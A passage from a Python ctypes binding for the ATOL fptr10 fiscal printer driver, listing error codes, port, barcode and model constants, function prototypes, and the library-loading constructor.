LIBFPTR_ERROR_PRINTER_FAULT,\n LIBFPTR_ERROR_MECHANICAL_FAULT,\n LIBFPTR_ERROR_INVALID_RECEIPT_TYPE,\n LIBFPTR_ERROR_INVALID_UNIT_TYPE,\n LIBFPTR_ERROR_NO_MEMORY,\n LIBFPTR_ERROR_PICTURE_NOT_FOUND,\n LIBFPTR_ERROR_NONCACH_PAYMENTS_TOO_MUCH,\n LIBFPTR_ERROR_RETURN_DENIED,\n LIBFPTR_ERROR_PAYMENTS_OVERFLOW,\n LIBFPTR_ERROR_BUSY,\n LIBFPTR_ERROR_GSM,\n LIBFPTR_ERROR_INVALID_DISCOUNT,\n LIBFPTR_ERROR_OPERATION_AFTER_DISCOUNT_DENIED,\n LIBFPTR_ERROR_INVALID_DEPARTMENT,\n LIBFPTR_ERROR_INVALID_PAYMENT_TYPE,\n LIBFPTR_ERROR_MULTIPLICATION_OVERFLOW,\n LIBFPTR_ERROR_DENIED_BY_SETTINGS,\n LIBFPTR_ERROR_TOTAL_OVERFLOW,\n LIBFPTR_ERROR_DENIED_IN_ANNULATION_RECEIPT,\n LIBFPTR_ERROR_JOURNAL_OVERFLOW,\n LIBFPTR_ERROR_NOT_FULLY_PAID,\n LIBFPTR_ERROR_DENIED_IN_RETURN_RECEIPT,\n LIBFPTR_ERROR_SHIFT_EXPIRED,\n LIBFPTR_ERROR_DENIED_IN_SELL_RECEIPT,\n LIBFPTR_ERROR_FISCAL_MEMORY_OVERFLOW,\n LIBFPTR_ERROR_INVALID_PASSWORD,\n LIBFPTR_ERROR_JOURNAL_BUSY,\n LIBFPTR_ERROR_DENIED_IN_CLOSED_SHIFT,\n LIBFPTR_ERROR_INVALID_TABLE_NUMBER,\n LIBFPTR_ERROR_INVALID_ROW_NUMBER,\n LIBFPTR_ERROR_INVALID_FIELD_NUMBER,\n LIBFPTR_ERROR_INVALID_DATE_TIME,\n LIBFPTR_ERROR_INVALID_STORNO_SUM,\n LIBFPTR_ERROR_CHANGE_CALCULATION,\n LIBFPTR_ERROR_NO_CASH,\n LIBFPTR_ERROR_DENIED_IN_CLOSED_RECEIPT,\n LIBFPTR_ERROR_DENIED_IN_OPENED_RECEIPT,\n LIBFPTR_ERROR_DENIED_IN_OPENED_SHIFT,\n LIBFPTR_ERROR_SERIAL_NUMBER_ALREADY_ENTERED,\n LIBFPTR_ERROR_TOO_MUCH_REREGISTRATIONS,\n LIBFPTR_ERROR_INVALID_SHIFT_NUMBER,\n LIBFPTR_ERROR_INVALID_SERIAL_NUMBER,\n LIBFPTR_ERROR_INVALID_RNM_VATIN,\n LIBFPTR_ERROR_FISCAL_PRINTER_NOT_ACTIVATED,\n LIBFPTR_ERROR_SERIAL_NUMBER_NOT_ENTERED,\n LIBFPTR_ERROR_NO_MORE_REPORTS,\n LIBFPTR_ERROR_MODE_NOT_ACTIVATED,\n LIBFPTR_ERROR_RECORD_NOT_FOUND_IN_JOURNAL,\n LIBFPTR_ERROR_INVALID_LICENSE,\n LIBFPTR_ERROR_NEED_FULL_RESET,\n LIBFPTR_ERROR_DENIED_BY_LICENSE,\n LIBFPTR_ERROR_DISCOUNT_CANCELLATION_DENIED,\n LIBFPTR_ERROR_CLOSE_RECEIPT_DENIED,\n LIBFPTR_ERROR_INVALID_ROUTE_NUMBER,\n LIBFPTR_ERROR_INVALID_START_ZONE_NUMBER,\n LIBFPTR_ERROR_INVALID_END_ZONE_NUMBER,\n LIBFPTR_ERROR_INVALID_RATE_TYPE,\n LIBFPTR_ERROR_INVALID_RATE,\n LIBFPTR_ERROR_FISCAL_MODULE_EXCHANGE,\n LIBFPTR_ERROR_NEED_TECHNICAL_SUPPORT,\n LIBFPTR_ERROR_SHIFT_NUMBERS_DID_NOT_MATCH,\n LIBFPTR_ERROR_DEVICE_NOT_FOUND,\n LIBFPTR_ERROR_EXTERNAL_DEVICE_CONNECTION,\n LIBFPTR_ERROR_DISPENSER_INVALID_STATE,\n LIBFPTR_ERROR_INVALID_POSITIONS_COUNT,\n LIBFPTR_ERROR_DISPENSER_INVALID_NUMBER,\n LIBFPTR_ERROR_INVALID_DIVIDER,\n LIBFPTR_ERROR_FN_ACTIVATION_DENIED,\n LIBFPTR_ERROR_PRINTER_OVERHEAT,\n LIBFPTR_ERROR_FN_EXCHANGE,\n LIBFPTR_ERROR_FN_INVALID_FORMAT,\n LIBFPTR_ERROR_FN_INVALID_STATE,\n LIBFPTR_ERROR_FN_FAULT,\n LIBFPTR_ERROR_FN_CRYPTO_FAULT,\n LIBFPTR_ERROR_FN_EXPIRED,\n LIBFPTR_ERROR_FN_OVERFLOW,\n LIBFPTR_ERROR_FN_INVALID_DATE_TIME,\n LIBFPTR_ERROR_FN_NO_MORE_DATA,\n LIBFPTR_ERROR_FN_TOTAL_OVERFLOW,\n LIBFPTR_ERROR_BUFFER_OVERFLOW,\n LIBFPTR_ERROR_PRINT_SECOND_COPY_DENIED,\n LIBFPTR_ERROR_NEED_RESET_JOURNAL,\n LIBFPTR_ERROR_TAX_SUM_TOO_MUCH,\n LIBFPTR_ERROR_TAX_ON_LAST_OPERATION_DENIED,\n LIBFPTR_ERROR_INVALID_FN_NUMBER,\n LIBFPTR_ERROR_TAX_CANCEL_DENIED,\n LIBFPTR_ERROR_LOW_BATTERY,\n LIBFPTR_ERROR_FN_INVALID_COMMAND,\n LIBFPTR_ERROR_FN_COMMAND_OVERFLOW,\n LIBFPTR_ERROR_FN_NO_TRANSPORT_CONNECTION,\n LIBFPTR_ERROR_FN_CRYPTO_HAS_EXPIRED,\n LIBFPTR_ERROR_FN_RESOURCE_HAS_EXPIRED,\n LIBFPTR_ERROR_INVALID_MESSAGE_FROM_OFD,\n LIBFPTR_ERROR_FN_HAS_NOT_SEND_DOCUMENTS,\n LIBFPTR_ERROR_FN_TIMEOUT,\n LIBFPTR_ERROR_FN_SHIFT_EXPIRED,\n LIBFPTR_ERROR_FN_INVALID_TIME_DIFFERENCE,\n LIBFPTR_ERROR_INVALID_TAXATION_TYPE,\n LIBFPTR_ERROR_INVALID_TAX_TYPE,\n LIBFPTR_ERROR_INVALID_COMMODITY_PAYMENT_TYPE,\n LIBFPTR_ERROR_INVALID_COMMODITY_CODE_TYPE,\n LIBFPTR_ERROR_EXCISABLE_COMMODITY_DENIED,\n LIBFPTR_ERROR_FISCAL_PROPERTY_WRITE,\n LIBFPTR_ERROR_INVALID_COUNTER_TYPE,\n LIBFPTR_ERROR_CUTTER_FAULT,\n LIBFPTR_ERROR_REPORT_INTERRUPTED,\n LIBFPTR_ERROR_INVALID_LEFT_MARGIN,\n LIBFPTR_ERROR_INVALID_ALIGNMENT,\n LIBFPTR_ERROR_INVALID_TAX_MODE,\n LIBFPTR_ERROR_FILE_NOT_FOUND,\n LIBFPTR_ERROR_PICTURE_TOO_BIG,\n LIBFPTR_ERROR_INVALID_BARCODE_PARAMS,\n LIBFPTR_ERROR_FISCAL_PROPERTY_DENIED,\n LIBFPTR_ERROR_FN_INTERFACE,\n LIBFPTR_ERROR_DATA_DUPLICATE,\n LIBFPTR_ERROR_NO_REQUIRED_FISCAL_PROPERTY,\n LIBFPTR_ERROR_FN_READ_DOCUMENT,\n LIBFPTR_ERROR_FLOAT_OVERFLOW,\n LIBFPTR_ERROR_INVALID_SETTING_VALUE,\n LIBFPTR_ERROR_HARD_FAULT,\n LIBFPTR_ERROR_FN_NOT_FOUND,\n LIBFPTR_ERROR_INVALID_AGENT_FISCAL_PROPERTY,\n LIBFPTR_ERROR_INVALID_FISCAL_PROPERTY_VALUE_1002_1056,\n LIBFPTR_ERROR_INVALID_FISCAL_PROPERTY_VALUE_1002_1017,\n LIBFPTR_ERROR_SCRIPT,\n LIBFPTR_ERROR_INVALID_USER_MEMORY_INDEX,\n LIBFPTR_ERROR_NO_ACTIVE_OPERATOR,\n LIBFPTR_ERROR_REGISTRATION_REPORT_INTERRUPTED,\n LIBFPTR_ERROR_CLOSE_FN_REPORT_INTERRUPTED,\n LIBFPTR_ERROR_OPEN_SHIFT_REPORT_INTERRUPTED,\n LIBFPTR_ERROR_OFD_EXCHANGE_REPORT_INTERRUPTED,\n LIBFPTR_ERROR_CLOSE_RECEIPT_INTERRUPTED,\n LIBFPTR_ERROR_FN_QUERY_INTERRUPTED,\n LIBFPTR_ERROR_RTC_FAULT,\n LIBFPTR_ERROR_MEMORY_FAULT,\n LIBFPTR_ERROR_CHIP_FAULT,\n LIBFPTR_ERROR_TEMPLATES_CORRUPTED,\n LIBFPTR_ERROR_INVALID_MAC_ADDRESS,\n LIBFPTR_ERROR_INVALID_SCRIPT_NUMBER,\n LIBFPTR_ERROR_SCRIPTS_FAULT,\n LIBFPTR_ERROR_INVALID_SCRIPTS_VERSION,\n LIBFPTR_ERROR_INVALID_CLICHE_FORMAT,\n LIBFPTR_ERROR_WAIT_FOR_REBOOT,\n LIBFPTR_ERROR_NO_LICENSE,\n LIBFPTR_ERROR_INVALID_FFD_VERSION,\n LIBFPTR_ERROR_CHANGE_SETTING_DENIED,\n LIBFPTR_ERROR_INVALID_NOMENCLATURE_TYPE,\n LIBFPTR_ERROR_INVALID_GTIN,\n LIBFPTR_ERROR_NEGATIVE_MATH_RESULT,\n LIBFPTR_ERROR_FISCAL_PROPERTIES_COMBINATION,\n LIBFPTR_ERROR_OPERATOR_LOGIN,\n LIBFPTR_ERROR_INVALID_INTERNET_CHANNEL,\n LIBFPTR_ERROR_DATETIME_NOT_SYNCRONIZED,\n LIBFPTR_ERROR_JOURNAL,\n LIBFPTR_ERROR_DENIED_IN_OPENED_DOC,\n LIBFPTR_ERROR_DENIED_IN_CLOSED_DOC,\n ) = RANGE(0, 202)\n\n (\n LIBFPTR_ERROR_BASE_WEB,\n LIBFPTR_ERROR_RECEIPT_PARSE_ERROR,\n LIBFPTR_ERROR_INTERRUPTED_BY_PREVIOUS_ERRORS,\n ) = RANGE(500, 503)\n\n (\n LIBFPTR_PORT_COM,\n LIBFPTR_PORT_USB,\n LIBFPTR_PORT_TCPIP,\n LIBFPTR_PORT_BLUETOOTH,\n ) = RANGE(0, 4)\n\n (\n LIBFPTR_PORT_BITS_7,\n LIBFPTR_PORT_BITS_8,\n ) = RANGE(7, 9)\n\n (\n LIBFPTR_PORT_PARITY_NO,\n LIBFPTR_PORT_PARITY_ODD,\n LIBFPTR_PORT_PARITY_EVEN,\n LIBFPTR_PORT_PARITY_MARK,\n LIBFPTR_PORT_PARITY_SPACE,\n ) = RANGE(0, 5)\n\n (\n LIBFPTR_PORT_SB_1,\n LIBFPTR_PORT_SB_1_5,\n LIBFPTR_PORT_SB_2,\n ) = RANGE(0, 3)\n\n (\n LIBFPTR_BT_EAN_8,\n LIBFPTR_BT_EAN_13,\n LIBFPTR_BT_UPC_A,\n LIBFPTR_BT_UPC_E,\n LIBFPTR_BT_CODE_39,\n LIBFPTR_BT_CODE_93,\n LIBFPTR_BT_CODE_128,\n LIBFPTR_BT_CODABAR,\n LIBFPTR_BT_ITF,\n LIBFPTR_BT_ITF_14,\n LIBFPTR_BT_GS1_128,\n LIBFPTR_BT_QR,\n LIBFPTR_BT_PDF417,\n LIBFPTR_BT_AZTEC,\n ) = RANGE(0, 14)\n\n (\n LIBFPTR_BC_DEFAULT,\n LIBFPTR_BC_0,\n LIBFPTR_BC_1,\n LIBFPTR_BC_2,\n LIBFPTR_BC_3,\n LIBFPTR_BC_4,\n LIBFPTR_BC_5,\n LIBFPTR_BC_6,\n LIBFPTR_BC_7,\n LIBFPTR_BC_8,\n ) = RANGE(0, 10)\n\n (\n LIBFPTR_TM_POSITION,\n LIBFPTR_TM_UNIT,\n ) = RANGE(0, 2)\n\n (\n LIBFPTR_SCT_OVERALL,\n LIBFPTR_SCT_FORWARD,\n ) = RANGE(0, 2)\n\n (\n LIBFPTR_CT_ROLLUP,\n LIBFPTR_CT_RESETTABLE,\n ) = RANGE(0, 2)\n\n (\n LIBFPTR_SS_CLOSED,\n LIBFPTR_SS_OPENED,\n LIBFPTR_SS_EXPIRED,\n ) = RANGE(0, 3)\n\n (\n LIBFPTR_CT_FULL,\n LIBFPTR_CT_PART,\n ) = RANGE(0, 2)\n\n (\n LIBFPTR_ALIGNMENT_LEFT,\n LIBFPTR_ALIGNMENT_CENTER,\n LIBFPTR_ALIGNMENT_RIGHT,\n ) = RANGE(0, 3)\n\n (\n LIBFPTR_TW_NONE,\n LIBFPTR_TW_WORDS,\n LIBFPTR_TW_CHARS,\n ) = RANGE(0, 3)\n\n (\n LIBFPTR_FNT_DEBUG,\n LIBFPTR_FNT_RELEASE,\n LIBFPTR_FNT_UNKNOWN,\n ) = RANGE(0, 3)\n\n (\n LIBFPTR_RT_CLOSE_SHIFT,\n LIBFPTR_RT_X,\n LIBFPTR_RT_LAST_DOCUMENT,\n LIBFPTR_RT_OFD_EXCHANGE_STATUS,\n LIBFPTR_RT_KKT_DEMO,\n LIBFPTR_RT_KKT_INFO,\n LIBFPTR_RT_OFD_TEST,\n LIBFPTR_RT_FN_DOC_BY_NUMBER,\n LIBFPTR_RT_QUANTITY,\n LIBFPTR_RT_DEPARTMENTS,\n LIBFPTR_RT_OPERATORS,\n LIBFPTR_RT_HOURS,\n LIBFPTR_RT_FN_REGISTRATIONS,\n LIBFPTR_RT_FN_SHIFT_TOTAL_COUNTERS,\n LIBFPTR_RT_FN_TOTAL_COUNTERS,\n LIBFPTR_RT_FN_NOT_SENT_DOCUMENTS_COUNTERS,\n LIBFPTR_RT_COMMODITIES_BY_TAXATION_TYPES,\n LIBFPTR_RT_COMMODITIES_BY_DEPARTMENTS,\n LIBFPTR_RT_COMMODITIES_BY_SUMS,\n LIBFPTR_RT_START_SERVICE,\n ) = RANGE(0, 20)\n\n (\n LIBFPTR_PT_CASH,\n LIBFPTR_PT_ELECTRONICALLY,\n LIBFPTR_PT_PREPAID,\n LIBFPTR_PT_CREDIT,\n LIBFPTR_PT_OTHER,\n LIBFPTR_PT_6,\n LIBFPTR_PT_7,\n LIBFPTR_PT_8,\n LIBFPTR_PT_9,\n LIBFPTR_PT_10,\n ) = RANGE(0, 10)\n\n (\n LIBFPTR_TAX_DEPARTMENT,\n LIBFPTR_TAX_VAT18,\n LIBFPTR_TAX_VAT10,\n LIBFPTR_TAX_VAT118,\n LIBFPTR_TAX_VAT110,\n LIBFPTR_TAX_VAT0,\n LIBFPTR_TAX_NO,\n ) = RANGE(0, 7)\n\n (\n LIBFPTR_EXTERNAL_DEVICE_DISPLAY,\n LIBFPTR_EXTERNAL_DEVICE_PINPAD,\n LIBFPTR_EXTERNAL_DEVICE_MODEM,\n LIBFPTR_EXTERNAL_DEVICE_BARCODE_SCANNER,\n ) = RANGE(0, 4)\n\n (\n LIBFPTR_DT_STATUS,\n LIBFPTR_DT_CASH_SUM,\n LIBFPTR_DT_UNIT_VERSION,\n LIBFPTR_DT_PICTURE_INFO,\n LIBFPTR_DT_LICENSE_ACTIVATED,\n LIBFPTR_DT_REGISTRATIONS_SUM,\n LIBFPTR_DT_REGISTRATIONS_COUNT,\n LIBFPTR_DT_PAYMENT_SUM,\n LIBFPTR_DT_CASHIN_SUM,\n LIBFPTR_DT_CASHIN_COUNT,\n LIBFPTR_DT_CASHOUT_SUM,\n LIBFPTR_DT_CASHOUT_COUNT,\n LIBFPTR_DT_REVENUE,\n LIBFPTR_DT_DATE_TIME,\n LIBFPTR_DT_SHIFT_STATE,\n LIBFPTR_DT_RECEIPT_STATE,\n LIBFPTR_DT_SERIAL_NUMBER,\n LIBFPTR_DT_MODEL_INFO,\n LIBFPTR_DT_RECEIPT_LINE_LENGTH,\n LIBFPTR_DT_CUTTER_RESOURCE,\n LIBFPTR_DT_STEP_RESOURCE,\n LIBFPTR_DT_TERMAL_RESOURCE,\n LIBFPTR_DT_ENVD_MODE,\n LIBFPTR_DT_SHIFT_TAX_SUM,\n LIBFPTR_DT_RECEIPT_TAX_SUM,\n LIBFPTR_DT_NON_NULLABLE_SUM,\n LIBFPTR_DT_RECEIPT_COUNT,\n LIBFPTR_DT_CANCELLATION_COUNT_ALL,\n LIBFPTR_DT_CANCELLATION_SUM,\n LIBFPTR_DT_CANCELLATION_SUM_ALL,\n LIBFPTR_DT_POWER_SOURCE_STATE,\n LIBFPTR_DT_CANCELLATION_COUNT,\n LIBFPTR_DT_NON_NULLABLE_SUM_BY_PAYMENTS,\n LIBFPTR_DT_PRINTER_TEMPERATURE,\n LIBFPTR_DT_FATAL_STATUS,\n LIBFPTR_DT_MAC_ADDRESS,\n LIBFPTR_DT_DEVICE_UPTIME,\n LIBFPTR_DT_RECEIPT_BYTE_COUNT,\n LIBFPTR_DT_DISCOUNT_AND_SURCHARGE_SUM,\n LIBFPTR_DT_LK_USER_CODE,\n LIBFPTR_DT_LAST_SENT_OFD_DOCUMENT_DATE_TIME,\n ) = RANGE(0, 41)\n\n (\n LIBFPTR_FNDT_TAG_VALUE,\n LIBFPTR_FNDT_OFD_EXCHANGE_STATUS,\n LIBFPTR_FNDT_FN_INFO,\n LIBFPTR_FNDT_LAST_REGISTRATION,\n LIBFPTR_FNDT_LAST_RECEIPT,\n LIBFPTR_FNDT_LAST_DOCUMENT,\n LIBFPTR_FNDT_SHIFT,\n LIBFPTR_FNDT_FFD_VERSIONS,\n LIBFPTR_FNDT_VALIDITY,\n LIBFPTR_FNDT_REG_INFO,\n LIBFPTR_FNDT_DOCUMENTS_COUNT_IN_SHIFT,\n LIBFPTR_FNDT_ERRORS,\n LIBFPTR_FNDT_TICKET_BY_DOC_NUMBER,\n LIBFPTR_FNDT_DOCUMENT_BY_NUMBER,\n ) = RANGE(0, 14)\n\n (\n LIBFPTR_UT_FIRMWARE,\n LIBFPTR_UT_CONFIGURATION,\n LIBFPTR_UT_TEMPLATES,\n LIBFPTR_UT_CONTROL_UNIT,\n LIBFPTR_UT_BOOT,\n ) = RANGE(0, 5)\n\n (\n LIBFPTR_FNOP_REGISTRATION,\n LIBFPTR_FNOP_CHANGE_FN,\n LIBFPTR_FNOP_CHANGE_PARAMETERS,\n LIBFPTR_FNOP_CLOSE_ARCHIVE,\n ) = RANGE(0, 4)\n\n (\n LIBFPTR_OFD_CHANNEL_NONE,\n LIBFPTR_OFD_CHANNEL_USB,\n LIBFPTR_OFD_CHANNEL_PROTO,\n ) = RANGE(0, 3)\n\n (\n LIBFPTR_PST_POWER_SUPPLY,\n LIBFPTR_PST_RTC_BATTERY,\n LIBFPTR_PST_BATTERY,\n ) = RANGE(0, 3)\n\n (\n LIBFPTR_RT_LAST_DOCUMENT_LINES,\n LIBFPTR_RT_FN_DOCUMENT_TLVS,\n LIBFPTR_RT_EXEC_USER_SCRIPT,\n ) = RANGE(0, 3)\n\n (\n LIBFPTR_LOG_ERROR,\n LIBFPTR_LOG_WARN,\n LIBFPTR_LOG_INFO,\n LIBFPTR_LOG_DEBUG,\n ) = RANGE(0, 4)\n\n (\n LIBFPTR_NT_FURS,\n LIBFPTR_NT_MEDICINES,\n LIBFPTR_NT_TOBACCO,\n ) = RANGE(0, 3)\n\n (\n LIBFPTR_UMO_GET_SIZE,\n LIBFPTR_UMO_READ_DATA,\n LIBFPTR_UMO_WRITE_DATA,\n LIBFPTR_UMO_READ_STRING,\n LIBFPTR_UMO_WRITE_STRING,\n LIBFPTR_UMO_COMMIT,\n ) = RANGE(0, 6)\n\n (\n LIBFPTR_GUI_PARENT_NATIVE,\n LIBFPTR_GUI_PARENT_QT,\n ) = RANGE(0, 2)\n\n (\n LIBFPTR_DEFER_NONE,\n LIBFPTR_DEFER_PRE,\n LIBFPTR_DEFER_POST,\n ) = RANGE(0, 3)\n\n LIBFPTR_SETTING_LIBRARY_PATH = \"LibraryPath\"\n\n LIBFPTR_SETTING_MODEL = \"Model\"\n\n LIBFPTR_SETTING_PORT = \"Port\"\n\n LIBFPTR_SETTING_BAUDRATE = \"BaudRate\"\n\n LIBFPTR_SETTING_BITS = \"Bits\"\n\n LIBFPTR_SETTING_PARITY = \"Parity\"\n\n LIBFPTR_SETTING_STOPBITS = \"StopBits\"\n\n LIBFPTR_SETTING_IPADDRESS = \"IPAddress\"\n\n LIBFPTR_SETTING_IPPORT = \"IPPort\"\n\n LIBFPTR_SETTING_MACADDRESS = \"MACAddress\"\n\n LIBFPTR_SETTING_COM_FILE = \"ComFile\"\n\n LIBFPTR_SETTING_USB_DEVICE_PATH = \"UsbDevicePath\"\n\n LIBFPTR_SETTING_BT_AUTOENABLE = \"AutoEnableBluetooth\"\n\n LIBFPTR_SETTING_BT_AUTODISABLE = \"AutoDisableBluetooth\"\n\n LIBFPTR_SETTING_ACCESS_PASSWORD = \"AccessPassword\"\n\n LIBFPTR_SETTING_USER_PASSWORD = \"UserPassword\"\n\n LIBFPTR_SETTING_OFD_CHANNEL = \"OfdChannel\"\n\n LIBFPTR_SETTING_EXISTED_COM_FILES = \"ExistedComFiles\"\n\n LIBFPTR_MODEL_UNKNOWN = 0\n\n LIBFPTR_MODEL_ATOL_25F = 57\n\n LIBFPTR_MODEL_ATOL_30F = 61\n\n LIBFPTR_MODEL_ATOL_55F = 62\n\n LIBFPTR_MODEL_ATOL_22F = 63\n\n LIBFPTR_MODEL_ATOL_52F = 64\n\n LIBFPTR_MODEL_ATOL_11F = 67\n\n LIBFPTR_MODEL_ATOL_77F = 69\n\n LIBFPTR_MODEL_ATOL_90F = 72\n\n LIBFPTR_MODEL_ATOL_60F = 75\n\n LIBFPTR_MODEL_ATOL_42FS = 77\n\n LIBFPTR_MODEL_ATOL_15F = 78\n\n LIBFPTR_MODEL_ATOL_50F = 80\n\n LIBFPTR_MODEL_ATOL_20F = 81\n\n LIBFPTR_MODEL_ATOL_91F = 82\n\n LIBFPTR_MODEL_ATOL_92F = 84\n\n LIBFPTR_MODEL_ATOL_SIGMA_10 = 86\n\n LIBFPTR_MODEL_ATOL_50 = 100\n\n LIBFPTR_MODEL_ATOL_AUTO = 500\n\n LIBFPTR_PORT_BR_1200 = 1200\n\n LIBFPTR_PORT_BR_2400 = 2400\n\n LIBFPTR_PORT_BR_4800 = 4800\n\n LIBFPTR_PORT_BR_9600 = 9600\n\n LIBFPTR_PORT_BR_19200 = 19200\n\n LIBFPTR_PORT_BR_38400 = 38400\n\n LIBFPTR_PORT_BR_57600 = 57600\n\n LIBFPTR_PORT_BR_115200 = 115200\n\n LIBFPTR_FNS_INITIAL = 0\n\n LIBFPTR_FNS_CONFIGURED = 1\n\n LIBFPTR_FNS_FISCAL_MODE = 3\n\n LIBFPTR_FNS_POSTFISCAL_MODE = 7\n\n LIBFPTR_FNS_ACCESS_ARCHIVE = 15\n\n LIBFPTR_RT_CLOSED = 0\n\n LIBFPTR_RT_SELL = 1\n\n LIBFPTR_RT_SELL_RETURN = 2\n\n LIBFPTR_RT_SELL_CORRECTION = 7\n\n LIBFPTR_RT_SELL_RETURN_CORRECTION = 8\n\n LIBFPTR_RT_BUY = 4\n\n LIBFPTR_RT_BUY_RETURN = 5\n\n LIBFPTR_RT_BUY_CORRECTION = 9\n\n LIBFPTR_RT_BUY_RETURN_CORRECTION = 10\n\n LIBFPTR_FFD_UNKNOWN = 0\n\n LIBFPTR_FFD_1_0 = 100\n\n LIBFPTR_FFD_1_0_5 = 105\n\n LIBFPTR_FFD_1_1 = 110\n\n LIBFPTR_TT_DEFAULT = 0\n\n LIBFPTR_TT_OSN = 1\n\n LIBFPTR_TT_USN_INCOME = 2\n\n LIBFPTR_TT_USN_INCOME_OUTCOME = 4\n\n LIBFPTR_TT_ENVD = 8\n\n LIBFPTR_TT_ESN = 16\n\n LIBFPTR_TT_PATENT = 32\n\n LIBFPTR_AT_NONE = 0\n\n LIBFPTR_AT_BANK_PAYING_AGENT = 1\n\n LIBFPTR_AT_BANK_PAYING_SUBAGENT = 2\n\n LIBFPTR_AT_PAYING_AGENT = 4\n\n LIBFPTR_AT_PAYING_SUBAGENT = 8\n\n LIBFPTR_AT_ATTORNEY = 16\n\n LIBFPTR_AT_COMMISSION_AGENT = 32\n\n LIBFPTR_AT_ANOTHER = 64\n\n LIBFPTR_FN_DOC_REGISTRATION = 1\n\n LIBFPTR_FN_DOC_OPEN_SHIFT = 2\n\n LIBFPTR_FN_DOC_RECEIPT = 3\n\n LIBFPTR_FN_DOC_BSO = 4\n\n LIBFPTR_FN_DOC_CLOSE_SHIFT = 5\n\n LIBFPTR_FN_DOC_CLOSE_FN = 6\n\n LIBFPTR_FN_DOC_OPERATOR_CONFIRMATION = 7\n\n LIBFPTR_FN_DOC_REREGISTRATION = 11\n\n LIBFPTR_FN_DOC_EXCHANGE_STATUS = 21\n\n LIBFPTR_FN_DOC_CORRECTION = 31\n\n LIBFPTR_FN_DOC_BSO_CORRECTION = 41\n\n\n DEFAULT_BUFF_SIZE = 512\n\n CREATE_METHOD = ctypes.CFUNCTYPE(ctypes.c_int, ctypes.POINTER(ctypes.c_void_p))\n DESTROY_METHOD = ctypes.CFUNCTYPE(None, ctypes.POINTER(ctypes.c_void_p))\n GET_VERSION_METHOD = ctypes.CFUNCTYPE(ctypes.c_char_p)\n\n METHOD = ctypes.CFUNCTYPE(ctypes.c_int,\n ctypes.c_void_p)\n\n IS_OPENED_METHOD = ctypes.CFUNCTYPE(ctypes.c_int,\n ctypes.c_void_p)\n\n GET_ERROR_CODE_METHOD = ctypes.CFUNCTYPE(ctypes.c_int,\n ctypes.c_void_p)\n GET_ERROR_DESCRIPTION_METHOD = ctypes.CFUNCTYPE(ctypes.c_int,\n ctypes.c_void_p,\n ctypes.c_wchar_p,\n ctypes.c_int)\n\n SET_SETTINGS_METHOD = ctypes.CFUNCTYPE(ctypes.c_int,\n ctypes.c_void_p,\n ctypes.c_wchar_p)\n GET_SETTINGS_METHOD = ctypes.CFUNCTYPE(ctypes.c_int,\n ctypes.c_void_p,\n ctypes.c_wchar_p,\n ctypes.c_int)\n\n SET_SINGLE_SETTING_METHOD = ctypes.CFUNCTYPE(None,\n ctypes.c_void_p,\n ctypes.c_wchar_p,\n ctypes.c_wchar_p)\n GET_SINGLE_SETTING_METHOD = ctypes.CFUNCTYPE(ctypes.c_int,\n ctypes.c_void_p,\n ctypes.c_wchar_p,\n ctypes.c_wchar_p,\n ctypes.c_int)\n\n SET_BYTEARRAY_METHOD = ctypes.CFUNCTYPE(None,\n ctypes.c_void_p,\n ctypes.c_int,\n ctypes.POINTER(ctypes.c_ubyte), ctypes.c_int)\n GET_BYTEARRAY_METHOD = ctypes.CFUNCTYPE(ctypes.c_int,\n ctypes.c_void_p,\n ctypes.c_int,\n ctypes.POINTER(ctypes.c_ubyte), ctypes.c_int)\n\n SET_INT_METHOD = ctypes.CFUNCTYPE(None,\n ctypes.c_void_p,\n ctypes.c_int,\n ctypes.c_uint)\n GET_INT_METHOD = ctypes.CFUNCTYPE(ctypes.c_uint,\n ctypes.c_void_p,\n ctypes.c_int)\n\n SET_BOOL_METHOD = ctypes.CFUNCTYPE(None,\n ctypes.c_void_p,\n ctypes.c_int,\n ctypes.c_int)\n GET_BOOL_METHOD = ctypes.CFUNCTYPE(ctypes.c_int,\n ctypes.c_void_p,\n ctypes.c_int)\n\n SET_DOUBLE_METHOD = ctypes.CFUNCTYPE(None,\n ctypes.c_void_p,\n ctypes.c_int,\n ctypes.c_double)\n GET_DOUBLE_METHOD = ctypes.CFUNCTYPE(ctypes.c_double,\n ctypes.c_void_p,\n ctypes.c_int)\n\n SET_STRING_METHOD = ctypes.CFUNCTYPE(None,\n ctypes.c_void_p,\n ctypes.c_int,\n ctypes.c_wchar_p)\n GET_STRING_METHOD = ctypes.CFUNCTYPE(ctypes.c_int,\n ctypes.c_void_p,\n ctypes.c_int,\n ctypes.c_wchar_p, ctypes.c_int)\n\n SET_DATETIME_METHOD = ctypes.CFUNCTYPE(None,\n ctypes.c_void_p,\n ctypes.c_int,\n ctypes.c_int, ctypes.c_int, ctypes.c_int, ctypes.c_int,\n ctypes.c_int,\n ctypes.c_int)\n GET_DATETIME_METHOD = ctypes.CFUNCTYPE(None,\n ctypes.c_void_p,\n ctypes.c_int,\n ctypes.POINTER(ctypes.c_int),\n ctypes.POINTER(ctypes.c_int),\n ctypes.POINTER(ctypes.c_int),\n ctypes.POINTER(ctypes.c_int),\n ctypes.POINTER(ctypes.c_int),\n ctypes.POINTER(ctypes.c_int))\n\n LOG_WRITE_METHOD = ctypes.CFUNCTYPE(ctypes.c_int,\n ctypes.c_wchar_p,\n ctypes.c_int,\n ctypes.c_wchar_p)\n\n SHOW_PROPERTIES_METHOD = ctypes.CFUNCTYPE(ctypes.c_int,\n ctypes.c_void_p,\n ctypes.c_int,\n ctypes.c_void_p)\n\n def __init__(self, lib_path):\n assert sys.version_info >= (2, 6)\n self.lib_path = lib_path\n if platform.system() == 'Windows':\n if not self.lib_path.endswith('fptr10.dll'):\n self.lib_path = os.path.join(self.lib_path, 'fptr10.dll')\n try:\n ctypes.CDLL(os.path.join(os.path.dirname(self.lib_path), 'msvcp140.dll'), mode=ctypes.RTLD_LOCAL)\n self.library = ctypes.CDLL(self.lib_path, mode=ctypes.RTLD_LOCAL)\n except OSError:\n self.lib_path = os.path.join(QueryValueEx(OpenKey(HKEY_LOCAL_MACHINE, \"Software\\\\ATOL\\\\Drivers\\\\10.0\\\\KKT\"), \"INSTALL_DIR\")[0], 'bin\\\\fptr10.dll')\n ctypes.CDLL(os.path.join(os.path.dirname(self.lib_path), 'msvcp140.dll'), mode=ctypes.RTLD_LOCAL)\n self.library = ctypes.CDLL(self.lib_path, mode=ctypes.RTLD_LOCAL)\n else:\n if not self.lib_path.endswith('libfptr10.so'):\n self.lib_path = os.path.join(self.lib_path, 'libfptr10.so')\n self.library = ctypes.CDLL(self.lib_path, mode=ctypes.RTLD_LOCAL)\n \n self.interface = ctypes.c_void_p(0)\n 